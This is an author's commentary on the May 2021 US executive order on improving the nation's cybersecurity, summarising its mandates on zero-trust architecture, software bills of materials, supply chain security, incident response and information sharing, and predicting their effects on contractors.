The President of the United States has issued an executive order concerning cybersecurity. https://www.whitehouse.gov/briefing-room/presidential-actions/2021/05/12/executive-order-on-improving-the-nations-cybersecurity/
This is my rapid-response analysis.
The order was undoubtedly in preparation for a considerable amount of time, but it was released following the ransomware attack on the Colonial Pipeline in the US, which carries petroleum products along most of the East Coast.
Technically, the executive order applies only to US government contractors, but many of the provisions apply to the entire supply chain leading up to these directly specified customers. As a result, most of the orders will impact to varying degrees any company that does business with a government contractor as well as any government t contractor or supplier. An executive order cannot compel companies that are not government contractors to change what they do, but those who do not may be excluded from doing business with the government and any of its contractors or suppliers, so it, in effect, applies to almost all companies.
The executive order is intended to do several things:
·
Remove barriers to sharing
threat information, primarily between the government and private entities, but
it will also have the effect of making it easier to share information among
private entities.
·
Strengthen cybersecurity
standards.
·
Mandate the wider use of
zero-trust methods and architectures.
·
Require software developers to
maintain greater visibility.
·
Make public security information
so that consumers can evaluate the security of a software system. As an outcome it establishes an “Energy-Star”
like program for rating software security.
·
Mandate the use of multi-factor
authentication where appropriate.
·
Strengthen the requirements around
encryption at rest and for data in motion.
·
Establish a cybersecurity
review board.
·
Create a standard playbook for
responding to cyber-incidents. I predict that this will end up being a mandate
that each company have a standard procedure for dealing with cyber-incidents.
·
Improve capabilities to detect cybersecurity
incidents
·
Improve investigative and
remediation capabilities.
Analysis
The order provides a lot of common sense
ideas for how to improve cybersecurity—common sense, that is, if you spend your
time thinking about cybersecurity.
Nothing in the order seems outlandish or overly burdensome. Cybersecurity is the grand challenge of the
21st Century and it is increasingly obvious that we need to pay a
lot more attention to it. Cybersecurity failures
are expensive and highly damaging to the reputations of those organizations
that are attacked.
The order discusses removing the
contractual barriers that prevent companies from sharing information about
cyberattacks. Although strictly, these
barriers include only those in US federal contracts, there will be increasing
pressure to share information among all concerned parties. Any information relevant to cyber incidents
or potential incidents must be reported promptly to relevant government
agencies, using industry-recognized formats. The extent of sharing will
certainly increase, but it will still require a careful balance among business
interests, privacy, and coordinated defense.
The focus of the order is to bring systems
up to modern cybersecurity standards. NIST, the National Institute of Standards
and Technology has been very active in creating these standards. Organizations may need to review their
security standards to be sure that they meet current standards. I would expect, in addition, that future
standard will be developed that will require additional investments. The order contains an intention to invest in
technology and personnel to match the modernization goals. It will require congressional action,
however, to actually fund these good intentions.
The order mandates transitioning to Zero Trust
Architecture. The order defines Zero
Trust Architecture as “a set of system design principles, and a coordinated
cybersecurity and system management strategy based on an acknowledgement that
threats exist both inside and outside traditional network boundaries.” This framework allows users full access to
the specific computational features that they need to perform their jobs. Traditional security architectures put all of
their effort in defending the perimeter of a network. Once through the firewall, an attacker would
essentially have free range because all machines within the firewall were considered
fully protected. Zero Trust Architecture
reverses that assumption. Every machine
is suspect, no matter where it located until it is verified that the machine
has a need for access to a resource and permission to access it.
Defenders have to correctly defend their
systems every time, but attackers need only succeed once. It is no longer a matter of whether attackers
will pierce the firewall, it is when and how will they find a way to do it. Therefore, internal as well as peripheral
defenses are necessary, and Zero-Trust Architectures provide a framework for
that internal + periphery protection.
The order requires new documentation and
compliance frameworks. These
requirements may impose some additional requirements on how companies document their
processes and products.
One of the most impactful features of the
new order is its focus on preventing supply chain attacks. It requires software that can resist attacks
and detect tampering. Each provider will
be required to verify that its software has not been compromised, including any
software that is used for development and deployment as well as in the
components that are used. The
government, with the involvement of the relevant parties, will be developing
guidelines that can be used to evaluate software security, including the
practices of developers and suppliers.
These parties will need to demonstrate their conformance with secure
practices. The guidelines are expected
to include (quoting from the order):
(i)
secure software development environments, including
such actions as:
(A) using administratively separate build environments;
(B) auditing trust relationships;
(C) establishing multi-factor, risk-based authentication and conditional
access across the enterprise;
(D) documenting and minimizing dependencies on enterprise products
that are part of the environments used to develop, build, and edit software;
(E) employing encryption for data; and
(F) monitoring operations and alerts and responding to attempted and
actual cyber incidents;
(ii)
generating and, when requested by a purchaser, providing artifacts that
demonstrate conformance to the processes set forth in subsection (e)(i) of this
section;
(iii)
employing automated tools, or comparable processes, to maintain
trusted source code supply chains, thereby ensuring the integrity of the code;
(iv)
employing automated tools, or comparable processes, that check for
known and potential vulnerabilities and remediate them, which shall operate
regularly, or at a minimum prior to product, version, or update release;
(v)
providing, when requested by a purchaser, artifacts of the
execution of the tools and processes described in subsection (e)(iii) and (iv)
of this section, and making publicly available summary information on
completion of these actions, to include a summary description of the risks
assessed and mitigated;
(vi)
maintaining accurate and up-to-date data, provenance (i.e., origin)
of software code or components, and controls on internal and third-party
software components, tools, and services present in software development
processes, and performing audits and enforcement of these controls on a
recurring basis;
(vii)
providing a purchaser a Software Bill of Materials (SBOM) for each product
directly or by publishing it on a public website;
(viii)
participating in a vulnerability disclosure program that includes a reporting
and disclosure process;
(ix)
attesting to conformity with secure software development practices; and
(x) ensuring and attesting, to the extent practicable,
to the integrity and provenance of open source software used within any portion
of a product.
Companies will need to provide a software
bill of materials that reflects all of the components included in the code. Modern code often contains many components,
some of which are purchased, some are open source, and some are developed in
house. Each of those components could introduce malware in what is called a supply
chain attack. The attacker corrupts
the component during its development, without the producer’s knowledge. The producer distributes this corrupt
component and certifies that actually comes from the producer, lulling its
users into a false sense of security.
The order includes an effort to build a
security rating system that can be applied to IoT (Internet of Things)
and other systems. This rating system is
intended to mimic the Energy Star ratings and make it easy for customers
(individuals and government agencies) to determine that a system has been
evaluated for security and what its status is.
The order mandates the development of a
standard set of procedures for dealing with cybersecurity incidents. From the private sector point of view, I
expect that this mandate will end up being a requirement that each party have
in place standard operating procedures for dealing with these attacks and for communicating
about them with the government and the public.
An important opportunity for innovation is
the mandate to improve detection of cybersecurity vulnerabilities. Right now, we are very effective at blocking malicious
activity the periphery (e.g., at the firewall), but we have seen that not all attacks
come in through the same channels. We
would benefit from a capability that identified evidence of an attack from
within the network. Eventually attackers will get into the internal systems and
we will need Endpoint Detection and Response measures to detect the presence of
attackers and remove them.
The order is very clear about the need for
security-related logs to be protected by cryptographic methods. Providers may need to adjust some logging
procedures to meet this requirement.
Conclusion
Overall, many of the mandates of this order involve features that are already known or are in development. The mandates for how suppliers develop and deliver software are likely to be the most impactful. If nothing else, this order highlights the need for enhanced cybersecurity, which should make it easier to persuade organizations of the importance of these measures.